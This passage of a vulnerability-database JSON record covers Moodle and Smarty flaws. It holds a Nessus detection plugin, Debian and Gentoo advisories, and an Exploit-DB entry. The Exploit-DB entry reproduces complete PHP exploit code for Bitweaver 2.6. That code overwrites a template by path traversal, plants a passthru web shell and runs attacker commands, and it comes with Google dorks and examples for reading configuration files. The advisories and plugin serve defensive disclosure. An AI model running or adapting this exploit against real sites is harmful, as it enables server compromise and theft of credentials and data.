Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "published": "2009-06-25T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 : moodle vulnerabilities (USN-791-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0501", "CVE-2008-4811", "CVE-2008-5432", "CVE-2008-5619", "CVE-2009-0502", "CVE-2008-4810", "CVE-2008-4796", "CVE-2008-6124", "CVE-2008-5153", "CVE-2009-0499", "CVE-2009-0500", "CVE-2009-1171", "CVE-2009-1669", "CVE-2007-3215"], "modified": "2009-06-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:moodle", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10"], "id": "UBUNTU_USN-791-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-791-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39516);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-3215\", \"CVE-2008-4796\", \"CVE-2008-4810\", \"CVE-2008-4811\", \"CVE-2008-5153\", \"CVE-2008-5432\", \"CVE-2008-5619\", \"CVE-2008-6124\", \"CVE-2009-0499\", \"CVE-2009-0500\", \"CVE-2009-0501\", \"CVE-2009-0502\", \"CVE-2009-1171\", \"CVE-2009-1669\");\n script_bugtraq_id(31862, 31887, 32402, 32799, 33610, 33612, 34278, 34918);\n script_xref(name:\"USN\", value:\"791-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 : moodle vulnerabilities (USN-791-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thor Larholm discovered that PHPMailer, as used by Moodle, did not\ncorrectly escape email addresses. A local attacker with direct access\nto the Moodle database could exploit this to execute arbitrary\ncommands as the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly\nescape shell meta-characters. An authenticated remote attacker could\nexecute arbitrary commands as the web server user, if curl was\ninstalled and configured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not\ncorrectly filter certain inputs. An authenticated remote attacker\ncould exploit this to execute arbitrary PHP commands as the web server\nuser. (CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did\nnot correctly handle temporary files. 
If the tool had been locally\nmodified, it could be made to overwrite arbitrary local files via\nsymlinks. (CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki\npage titles in certain areas. An authenticated remote attacker could\nexploit this to cause cross-site scripting (XSS), which could be used\nto modify or steal confidential data of other users within the same\nweb domain. (CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, 'Login as' feature, and\nlogging in Moodle did not correctly handle certain inputs. An\nauthenticated remote attacker could exploit this to generate XSS,\nwhich could be used to modify or steal confidential data of other\nusers within the same web domain. (CVE-2008-5619, CVE-2009-0500,\nCVE-2009-0502, MSA-08-0026, MSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly\nfilter SQL inputs. An authenticated remote attacker could execute\narbitrary SQL commands as the moodle database user, leading to a loss\nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings\nin Moodle were not protected from cross-site request forgery (CSRF).\nIf an authenticated user were tricked into visiting a malicious\nwebsite while logged into Moodle, a remote attacker could change the\nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008,\nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the\nCalendar Export tool. A remote attacker could gather a list of users,\nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any\nfunction to be used. An authenticated remote attacker could post a\nspecially crafted TeX formula to execute arbitrary TeX functions,\npotentially reading any file accessible to the web server user,\nleading to a loss of privacy. 
(CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user\npermissions when attempting to switch user accounts. An authenticated\nremote attacker could switch to any other Moodle user, leading to a\nloss of privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained\nXSS vulnerabilities. An unauthenticated remote attacker could exploit\nthis to modify or steal confidential data of other users within the\nsame web domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra\nMontesinos discovered that when users were deleted from Moodle, their\nprofiles and avatars were still visible. An authenticated remote\nattacker could exploit this to store information in profiles even\nafter they were removed, leading to spam traffic. (MSA-08-0015,\nMSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain\ninputs. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for\ngroup creation, mnet, essay question, HOST param, wiki param, and\nothers. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MDL-9288, MDL-11759,\nMDL-12079, MDL-12793, MDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when\nperforming a restore. An attacker authenticated as a Moodle\nadministrator could execute arbitrary SQL commands as the moodle\ndatabase user, leading to a loss of privacy or denial of service.\n(MDL-11857).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/791-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Roundcube 0.2beta RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 59, 79, 89, 94, 264, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2021 Canonical, Inc. / NASL script (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"moodle\", pkgver:\"1.8.2-1ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"moodle\", pkgver:\"1.8.2-1.2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1919-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : 
smarty\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-4810 CVE-2009-1669\nDebian Bug : 504328 529810\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\n The _expand_quoted_text function allows for certain restrictions in\n templates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\n The smarty_function_math function allows context-dependent attackers\n to execute arbitrary commands via shell metacharacters in the equation\n attribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2.dsc\n Size/MD5 checksum: 958 f061c466cef93df89e677aeb72101910\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14.orig.tar.gz\n Size/MD5 checksum: 144986 9186796ddbc29191306338dea9d632a0\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2.diff.gz\n Size/MD5 checksum: 4290 0ef9a669c127818f5ff084e2829738e9\n\nArchitecture independent 
packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2_all.deb\n Size/MD5 checksum: 183300 d0ac954aad344f20b5933b09593b2968\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2.dsc\n Size/MD5 checksum: 1409 f280e2733ef52ff621891f99b26386f3\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2.diff.gz\n Size/MD5 checksum: 4876 4d729d18d7efe68e1ce3023149436c01\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20.orig.tar.gz\n Size/MD5 checksum: 158091 35f405b2418a26a895302a2ce5bf89d2\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2_all.deb\n Size/MD5 checksum: 204412 1e8e85b298b97176359dd15731e0dc88\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2009-10-25T16:25:10", "published": "2009-10-25T16:25:10", "id": "DEBIAN:DSA-1919-1:C1894", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00242.html", "title": "[SECURITY] [DSA 1919-1] New smarty packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:19", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1919-2 
security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nAugust 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : smarty\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-4810 CVE-2009-1669\nDebian Bug : 504328 529810\n\nA regression was found in the patch applied in DSA 1919-1 to smarty,\nwhich caused compilation failures on some specific templates. This\nupdate corrects the fix. For reference, the full advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\n The _expand_quoted_text function allows for certain restrictions in\n templates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\n The smarty_function_math function allows context-dependent attackers\n to execute arbitrary commands via shell metacharacters in the equation\n attribute of the math function.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.20-1.3.\n\nThe testing (squeeze) and unstable distribution (sid) are not affected\nby this regression.\n\nWe recommend that you upgrade your smarty package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20.orig.tar.gz\n Size/MD5 checksum: 158091 
35f405b2418a26a895302a2ce5bf89d2\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3.diff.gz\n Size/MD5 checksum: 4861 fa15219470bdf157e4ccf0d20e6df918\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3.dsc\n Size/MD5 checksum: 1410 bdcbd684b08f012832e99a68b33b2bc7\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3_all.deb\n Size/MD5 checksum: 204244 aef92eaf06b3bc912717fc0fcf27de53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2010-08-17T20:47:24", "published": "2010-08-17T20:47:24", "id": "DEBIAN:DSA-1919-2:73FE7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00138.html", "title": "[SECURITY] [DSA 1919-2] New smarty packages fix regression", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T07:52:04", "description": "Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit. CVE-2009-1669,CVE-2009-1677,CVE-2009-1678. 
Webapps exploit for php platform", "published": "2009-05-12T00:00:00", "type": "exploitdb", "title": "Bitweaver <= 2.6 saveFeed Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1678", "CVE-2009-1677", "CVE-2009-1669"], "modified": "2009-05-12T00:00:00", "id": "EDB-ID:8659", "href": "https://www.exploit-db.com/exploits/8659/", "sourceData": "<?php\n /*\n Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit\n by Nine:Situations:Group::bookoo\n \n php.ini independent\n \n site: http://retrogod.altervista.org/\n software site: http://www.bitweaver.org/\n \n You need an user account and you need to change your \"display name\" in:\n \n {php}passthru($_SERVER[HTTP_CMD]);{/php}\n \n Register and click on Preferences, look at the \"User Information\" tab, inside the\n \"Real name\" text field write the code above, then click on Change.\n \n Google dorks:\n \"by bitweaver\" Version powered +boards\n \"You are running bitweaver in TEST mode\"|\"bitweaver * White Screen of Death\"\n \n Versions tested: 2.6.0, 2.0.2\n \n Vulnerability type: folder creation, file creation, file overwrite, PHP code injection.\n \n Explaination:\n look at /boards/boards_rss.php, line 102:\n ...\n echo $rss->saveFeed( $rss_version_name, $cacheFile );\n ...\n \n it calls saveFeed() function in an insecure way, arguments are built on\n $_REQUEST[version] var and may contain directory traversal sequences...\n \n now look at saveFeed() function in /rss/feedcreator.class.php\n \n ...\n function saveFeed($filename=\"\", $displayContents=true) {\n if ($filename==\"\") {\n $filename = $this->_generateFilename();\n }\n if ( !is_dir( dirname( $filename ))) {\n mkdir_p( dirname( $filename ));\n }\n $feedFile = fopen($filename, \"w+\");\n if ($feedFile) {\n fputs($feedFile,$this->createFeed());\n fclose($feedFile);\n if ($displayContents) {\n $this->_redirect($filename);\n }\n } else {\n echo \"<br /><b>Error creating feed file, please check 
write permissions.</b><br />\";\n }\n }\n \n }\n ...\n \n regardless of php.ini settings, you can create arbitrary folders, create/overwrite\n files, also you can end the path with an arbitrary extension, other than .xml passing\n a null char.\n ex.\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00\n \n now you have a bookoo.php in main folder:\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n You could inject php code by the Host header (but this is used to build filenames and\n create problems, also most of servers will respond with an http error) inside link tag\n or by your \"display name\" in title tag, ex.:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00&u=bookoo&p=password\n \n and here it is the new file (if your display name is \"<?php passthru($_GET[cmd]; ?>\"):\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed (<?php passthru($_GET[cmd]; ?>))</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Tue, 12 May 2009 00:30:54 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n if short_open_tag in php.ini is off (because of \"<?xml ...\" preamble\n generating a parse error with short_open_tag = on), you can now launch commands:\n \n 
http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls\n \n However, to bypass short_open_tag = on you can inject in a template file, ex.:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00&u=bookoo&p=password\n \n Now footer_inc.tpl looks like this:\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed ({php}passthru($_GET[CMD]);{/php})</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Tue, 12 May 2009 00:43:01 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n note that the shellcode is in Smarty template syntax ...\n \n Now you can launch commands from the main page:\n \n http://host/path_to_bitweaver/index.php?cmd=ls%20-la\n \n or\n \n http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la\n \n Additional notes:\n \n Without to have an account you can create a denial of service condition, ex. by replacing the main index.php:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00\n \n I found also a bug in Smarty template system, against windows servers you can launch commands\n with this:\n \n {math equation=\"`^C^A^L^C`\"}\n \n They filtered non-math functions, but they forgot php bacticks operators. This is\n the same of launch exec() !\n \n */\n $err[0] = \"[!] This script is intended to be launched from the cli!\";\n $err[1] = \"[!] You need the curl extesion loaded!\";\n \n if (php_sapi_name() <> \"cli\") {\n die($err[0]);\n }\n if (!extension_loaded('curl')) {\n $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :\n false;\n if ($win) {\n !dl(\"php_curl.dll\") ? die($err[1]) :\n nil;\n } else {\n !dl(\"php_curl.so\") ? 
die($err[1]) :\n nil;\n }\n }\n \n function syntax() {\n print (\n \"Syntax: php \".$argv[0].\" [host] [path] [user] [pass] [cmd] [options] \\n\". \"Options: \\n\". \"--port:[port] - specify a port \\n\". \" default->80 \\n\". \"--proxy:[host:port] - use proxy \\n\". \"Examples: php \".$argv[0].\" 192.168.0.1 /bitweaver/ bookoo pass ls \\n\". \" php \".$argv[0].\" 192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080\\n\". \" php \".$argv[0].\" 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81\");\n die();\n }\n \n \n error_reporting(E_ALL);\n $host = $argv[1];\n $path = $argv[2];\n $_usr = $argv[3];\n $_pwd = $argv[4];\n $_cmd = \"\";\n for ($i = 5; $i < $argc; $i++) {\n if ((!strstr($argv[$i], \"--proxy:\")) and (!strstr($argv[$i], \"--port:\"))) {\n $_cmd .= \" \".$argv[$i];\n }\n }\n $argv[5] ? print(\"[*] Command->$_cmd\\n\") :\n syntax();\n $_use_proxy = false;\n $port = 80;\n \n for ($i = 3; $i < $argc; $i++) {\n if (stristr($argv[$i], \"--proxy:\")) {\n $_use_proxy = true;\n $tmp = explode(\":\", $argv[$i]);\n $proxy_host = $tmp[1];\n $proxy_port = (int)$tmp[2];\n }\n if (stristr($argv[$i], \"--port:\")) {\n $tmp = explode(\":\", $argv[$i]);\n $port = (int)$tmp[1];\n }\n }\n \n function _s($url, $cmd, $is_post, $request) {\n global $_use_proxy, $proxy_host, $proxy_port, $cookie;\n $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL, $url);\n if ($is_post) {\n curl_setopt($ch, CURLOPT_POST, 1);\n curl_setopt($ch, CURLOPT_POSTFIELDS, $request.\"\\r\\n\");\n }\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n curl_setopt($ch, CURLOPT_USERAGENT, \"Googlebot/1.0 (googlebot@googlebot.com http://googlebot.com/)\");\n curl_setopt($ch, CURLOPT_TIMEOUT, 0);\n curl_setopt($ch, CURLOPT_HEADER, 1);\n $headers = array(\"Cookie: $cookie\", \"Cmd: \".$cmd.\" > ./../readme\");\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n \n if ($_use_proxy) {\n curl_setopt($ch, CURLOPT_PROXY, $proxy_host.\":\".$proxy_port);\n }\n $_d = curl_exec($ch);\n if 
(curl_errno($ch)) {\n die(\"[!] \".curl_error($ch).\"\\n\");\n } else {\n curl_close($ch);\n }\n return $_d;\n }\n \n $my_template = \"themes/templates/footer_inc.tpl\";\n $url = \"http://$host:$port\".$path.\"boards/boards_rss.php\";\n $_o = _s($url, \"\", 0, \"\");\n if (stristr($_o, \"404 Not Found\")) {\n die (\"[!] Vulnerable script not found!\\n\");\n }\n //catch site cookie, this is needed for version compatibility, not needed in 2.6.0\n $_tmp = explode(\"Set-Cookie: \", $_o);\n $cookie = \"\";\n for ($i = 1; $i < count($_tmp); $i++) {\n $_tmpii = explode(\";\", $_tmp[$i]);\n $cookie .= $_tmpii[0].\"; \";\n }\n print(\"[*] Cookie->\".$cookie.\"\\n\");\n $_o = _s($url, \"\", 1, \"version=/\\x00&\");\n $_o = _s($url, \"\", 1, \"u=$_usr&p=$_pwd&version=/../../../../$my_template\\x00&\");\n if (stristr($_o, \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\")) {\n print (\"[*] '$my_template' successfully overwritten!\\n\");\n } else {\n print($_o);\n die(\"[!] Error! No write permission on /\".$my_template.\" ...\");\n }\n if (stristr($_o, \"{php}passthru(\\$_SERVER[HTTP_CMD]);{/php}\")) {\n print (\"[*] Shell injected!\\n\");\n } else {\n print($_o);\n die(\"[!] Error! Shell not injected!\");\n }\n $url = \"http://$host:$port\".$path.\"wiki/index.php\";\n $_o = _s($url, $_cmd, 0, \"\");\n $url = \"http://$host:$port\".$path.\"readme\";\n $_o = _s($url, \"\", 0, \"\");\n if (stristr($_o, \"404 Not Found\")) {\n die (\"[!] stdout file not found!\\n\");\n } else {\n print(\"[*] Success!\\n\".$_o);\n }\n?>\n\n# milw0rm.com [2009-05-12]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8659/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4811", "CVE-2008-4810", "CVE-2008-1066", "CVE-2009-1669"], "edition": 1, "description": "### Background\n\nSmarty is a template engine for PHP. 
\n\n### Description\n\nMultiple vulnerabilities have been discovered in Smarty: \n\n * The vendor reported that the modifier.regex_replace.php plug-in contains an input sanitation flaw related to the ASCII NUL character (CVE-2008-1066).\n * The vendor reported that the _expand_quoted_text() function in libs/Smarty_Compiler.class.php contains an input sanitation flaw via multiple vectors (CVE-2008-4810, CVE-2008-4811).\n * Nine:Situations:Group::bookoo reported that the smarty_function_math() function in libs/plugins/function.math.php contains an input sanitation flaw (CVE-2009-1669).\n\n### Impact\n\nThese issues might allow a remote attacker to execute arbitrary PHP code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Smarty users should upgrade to an unaffected version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/smarty-2.6.23\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures have been available since June 2, 2009. It is likely that your system is already no longer affected by this issue.", "modified": "2010-06-02T00:00:00", "published": "2010-06-02T00:00:00", "id": "GLSA-201006-13", "href": "https://security.gentoo.org/glsa/201006-13", "type": "gentoo", "title": "Smarty: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}